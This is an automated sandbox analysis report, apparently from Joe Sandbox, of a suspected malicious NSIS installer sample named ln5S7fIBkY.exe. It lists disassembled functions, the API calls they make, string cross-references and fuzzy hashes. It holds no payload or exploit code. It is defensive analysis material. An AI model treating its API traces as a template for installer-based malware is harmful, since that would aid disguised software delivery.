lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\ln5S7fIBkY.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040373A
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403756
DeleteFileW.KERNEL32(0079F6E0,0079F6E0,?,007A9000,00000008,?,00000006,00000008,0000000A), ref: 004037B0
CopyFileW.KERNEL32(C:\Users\user\Desktop\ln5S7fIBkY.exe,0079F6E0,00000001,?,00000006,00000008,0000000A), ref: 004037C4
CloseHandle.KERNEL32(00000000,0079F6E0,0079F6E0,?,0079F6E0,00000000,?,00000006,00000008,0000000A), ref: 004037F1
GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403820
OpenProcessToken.ADVAPI32(00000000), ref: 00403827
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040383C
AdjustTokenPrivileges.ADVAPI32 ref: 0040385F
ExitWindowsEx.USER32(00000002,80040002), ref: 00403884
ExitProcess.KERNEL32 ref: 004038A7

Strings

SeShutdownPrivilege, xrefs: 00403836
NSIS Error, xrefs: 0040342E
C:\Users\user\AppData\Local\Temp\, xrefs: 004035A4, 004035A9, 004035BF, 004035CB, 004035DA, 004035E7, 004035F3, 004035FB, 00403711, 00403722, 0040372D, 00403739, 00403746, 00403755, 00403806
C:\Users\user\Desktop, xrefs: 00403733, 00403738, 00403765
C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen, xrefs: 00403592, 004036B2, 0040375C, 00403766
C:\Users\user\Desktop\ln5S7fIBkY.exe, xrefs: 004037BF
C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen, xrefs: 004036BD
"C:\Users\user\Desktop\ln5S7fIBkY.exe", xrefs: 00403443, 00403449, 0040363D
Error launching installer, xrefs: 00403697
UXTHEME, xrefs: 004033BC, 004033C1, 004033C7
.tmp, xrefs: 00403728
Low, xrefs: 004035E2
\Temp, xrefs: 004035C6
~nsu, xrefs: 0040370C
1033, xrefs: 00403610
TMP, xrefs: 004035FC
TEMP, xrefs: 004035F4

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: "C:\Users\user\Desktop\ln5S7fIBkY.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen$C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen$C:\Users\user\Desktop$C:\Users\user\Desktop\ln5S7fIBkY.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3441113951-2686351140
Opcode ID: 9d8f68ffad0294d88a57d06caf52fd5e4d58377833c7f28028a7ac4efefba988
Instruction ID: 91e47d7dade8a9784fbcad93861d46a8301334ec9f5f2e607ded2091cc9dec5c
Opcode Fuzzy Hash: 9d8f68ffad0294d88a57d06caf52fd5e4d58377833c7f28028a7ac4efefba988
Instruction Fuzzy Hash: 04D12671600300ABD720BF719D45B2B3AACEB8174AF00887FF981B62D1DB7D8955876E

Function 0040543E Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040549C
GetDlgItem.USER32(?,000003EE), ref: 004054AB
GetClientRect.USER32(?,?), ref: 004054E8
GetSystemMetrics.USER32(00000002), ref: 004054EF
SendMessageW.USER32(?,00001061,00000000,?), ref: 00405510
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405521
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405534
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405542
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405555
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405577
ShowWindow.USER32(?,00000008), ref: 0040558B
GetDlgItem.USER32(?,000003EC), ref: 004055AC
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055BC
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055D5
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055E1
GetDlgItem.USER32(?,000003F8), ref: 004054BA

Part of subcall function 00404243: SendMessageW.USER32(00000028,?,00000001,0040406E), ref: 00404251

GetDlgItem.USER32(?,000003EC), ref: 004055FE
CreateThread.KERNELBASE(00000000,00000000,Function_000053D2,00000000), ref: 0040560C
CloseHandle.KERNELBASE(00000000), ref: 00405613
ShowWindow.USER32(00000000), ref: 00405637
ShowWindow.USER32(?,00000008), ref: 0040563C
ShowWindow.USER32(00000008), ref: 00405686
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056BA
CreatePopupMenu.USER32 ref: 004056CB
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056DF
GetWindowRect.USER32(?,?), ref: 004056FF
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405718
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405750
OpenClipboard.USER32(00000000), ref: 00405760
EmptyClipboard.USER32 ref: 00405766
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405772
GlobalLock.KERNEL32(00000000), ref: 0040577C
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405790
GlobalUnlock.KERNEL32(00000000), ref: 004057B0
SetClipboardData.USER32(0000000D,00000000), ref: 004057BB
CloseClipboard.USER32 ref: 004057C1

Strings

{, xrefs: 004056A4

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 113d712a5db4ed50a1b1b5b673bec4020998c06132e16f1965ea7ae8cf20c9d1
Instruction ID: e2c232b37aba284685acfefcf9c5e68312cc9a4ea8bcb72f9f75ba3fcde89da4
Opcode Fuzzy Hash: 113d712a5db4ed50a1b1b5b673bec4020998c06132e16f1965ea7ae8cf20c9d1
Instruction Fuzzy Hash: 0EB15871900608FFDB119FA0DD89EAE7B79FB48354F00812AFA44BA1A0CB795E51DF58

Function 004059A9 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76F93420,00000000), ref: 004059D2
lstrcatW.KERNEL32(007A3F28,\*.*,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,76F93420,00000000), ref: 00405A1A
lstrcatW.KERNEL32(?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,76F93420,00000000), ref: 00405A3D
lstrlenW.KERNEL32(?,?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,76F93420,00000000), ref: 00405A43
FindFirstFileW.KERNEL32(007A3F28,?,?,?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,76F93420,00000000), ref: 00405A53
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AF3
FindClose.KERNEL32(00000000), ref: 00405B02

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004059B7
"C:\Users\user\Desktop\ln5S7fIBkY.exe", xrefs: 004059A9
\*.*, xrefs: 00405A14
(?z, xrefs: 00405A02

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\ln5S7fIBkY.exe"$(?z$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-1451639314
Opcode ID: 4d5656c0894c7074968c07a7ddfc43275556ff456bdda599b280e6413b0d544d
Instruction ID: 8b5db7531a0f4bb83586dba503ceccc8cbbd7972abfd892cd346515476ce1415
Opcode Fuzzy Hash: 4d5656c0894c7074968c07a7ddfc43275556ff456bdda599b280e6413b0d544d
Instruction Fuzzy Hash: 7D41D830900918A6CF21AB65CC89ABF7678EF82718F14827FF801B11C1D77C5985DE6E

Function 004065DA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,007A4F70,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,00405CBD,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,C:\Users\user\AppData\Local\Temp\nsu4D43.tmp,?,?,76F93420,004059C9,?,C:\Users\user\AppData\Local\Temp\,76F93420), ref: 004065E5
FindClose.KERNELBASE(00000000), ref: 004065F1

Strings

pOz, xrefs: 004065DB
C:\Users\user\AppData\Local\Temp\nsu4D43.tmp, xrefs: 004065DA

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\Users\user\AppData\Local\Temp\nsu4D43.tmp$pOz
API String ID: 2295610775-3324167676
Opcode ID: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
Instruction ID: b37c022bec08382a0cb03c9db181d2efdea8b1f21deeb05207148622359d6313
Opcode Fuzzy Hash: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
Instruction Fuzzy Hash: EFD01231519020AFC2001B38BD0C84B7A589F463307158B3AB4A6F11E4CB788C6296A9

Function 00402868 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402877

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 130c54d92b0f6b632a850d8ad33ab5dd3edf8e18272f0a02b3194b9783d02949
Instruction ID: f65ff15fdb1f10fb5373ba158cef8787300933468326e23b7288bb8c2237705b
Opcode Fuzzy Hash: 130c54d92b0f6b632a850d8ad33ab5dd3edf8e18272f0a02b3194b9783d02949
Instruction Fuzzy Hash: 87F0E271A10000ABCB00EFA0D9099ADB378EF04314F20417BF401F21D0DBB85D409B2A

Function 00403D35 Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D71
ShowWindow.USER32(?), ref: 00403D8E
DestroyWindow.USER32 ref: 00403DA2
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DBE
GetDlgItem.USER32(?,?), ref: 00403DDF
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DF3
IsWindowEnabled.USER32(00000000), ref: 00403DFA
GetDlgItem.USER32(?,00000001), ref: 00403EA8
GetDlgItem.USER32(?,00000002), ref: 00403EB2
SetClassLongW.USER32(?,000000F2,?), ref: 00403ECC
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F1D
GetDlgItem.USER32(?,00000003), ref: 00403FC3
ShowWindow.USER32(00000000,?), ref: 00403FE4
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FF6
EnableWindow.USER32(?,?), ref: 00404011
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404027
EnableMenuItem.USER32(00000000), ref: 0040402E
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404046
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404059
lstrlenW.KERNEL32(007A1F20,?,007A1F20,00000000), ref: 00404083
SetWindowTextW.USER32(?,007A1F20), ref: 00404097
ShowWindow.USER32(?,0000000A), ref: 004041CB

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: 47aca452d897ee1c606fef890413e6cfedcb511d419741730bd760ecf5135d2d
Instruction ID: db2580999c41c4fe450d1ee4fd1a55221d51bf0aef153e7307bc2b2ec56299a6
Opcode Fuzzy Hash: 47aca452d897ee1c606fef890413e6cfedcb511d419741730bd760ecf5135d2d
Instruction Fuzzy Hash: 3FC1DEB2504200AFDB206F61ED48E2B3AA8EB9A745F01453FF651B11F0CB399991DB5E

Function 00403987 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406671: GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
Part of subcall function 00406671: GetProcAddress.KERNEL32(00000000,?), ref: 0040669E

lstrcatW.KERNEL32(1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\,76F93420,"C:\Users\user\Desktop\ln5S7fIBkY.exe",00000000), ref: 00403A08
lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A88
lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000), ref: 00403A9B
GetFileAttributesW.KERNEL32(: Completed), ref: 00403AA6
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen), ref: 00403AEF

Part of subcall function 004061DE: wsprintfW.USER32 ref: 004061EB

RegisterClassW.USER32(007A79C0), ref: 00403B2C
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B44
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B79
ShowWindow.USER32(00000005,00000000), ref: 00403BAF
GetClassInfoW.USER32(00000000,RichEdit20W,007A79C0), ref: 00403BDB
GetClassInfoW.USER32(00000000,RichEdit,007A79C0), ref: 00403BE8
RegisterClassW.USER32(007A79C0), ref: 00403BF1
DialogBoxParamW.USER32(?,00000000,00403D35,00000000), ref: 00403C10

Strings

: Completed, xrefs: 00403A4F, 00403A58, 00403A66, 00403AB5, 00403ABB
C:\Users\user\AppData\Local\Temp\, xrefs: 00403993
Control Panel\Desktop\ResourceLocale, xrefs: 004039BB
.DEFAULT\Control Panel\International, xrefs: 004039F3
.exe, xrefs: 00403A95
C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen, xrefs: 00403A17, 00403A1F, 00403AC2, 00403AC8, 00403AD8
"C:\Users\user\Desktop\ln5S7fIBkY.exe", xrefs: 0040398B
_Nb, xrefs: 00403B0B, 00403B73
RichEdit, xrefs: 00403BE2
1033, xrefs: 004039A7, 00403A03
RichEdit20W, xrefs: 00403BD3, 00403BD9
RichEd20, xrefs: 00403BB5
RichEd32, xrefs: 00403BC3

Memory Dump Source

Source File: 00000000.00000002.1542390248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1542325043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542428380.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1542528019.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1543826830.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ln5S7fIBkY.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\ln5S7fIBkY.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-3017370947
Opcode ID: d8c6d654d8461c0bab771826e12c99a28648eabf0d3796c1ab225da277d58302
Instruction ID: fbef4646fbcf09e2f3785bbd11e1a9055ea34cd93d2d0ed92f9d0f486109358d
Opcode Fuzzy Hash: d8c6d654d8461c0bab771826e12c99a28648eabf0d3796c1ab225da277d58302
Instruction Fuzzy Hash: 4D61B434200700AED320AF669D45F2B3A6CEB86745F40857FF941B51E2DB7D6901CB2D

Function 00402EDD Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402EEE
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\ln5S7fIBkY.exe,00000400,?,00000006,00000008,0000000A), ref: 00402F0A

Part of subcall function 00405D8D: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\ln5S7fIBkY.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
Part of subcall function 00405D8D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3

GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ln5S7fIBkY.exe,C:\Users\user\Desktop\ln5S7fIBkY.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00402EE7
soft, xrefs: 00402FCB
Null, xrefs: 00402FD4
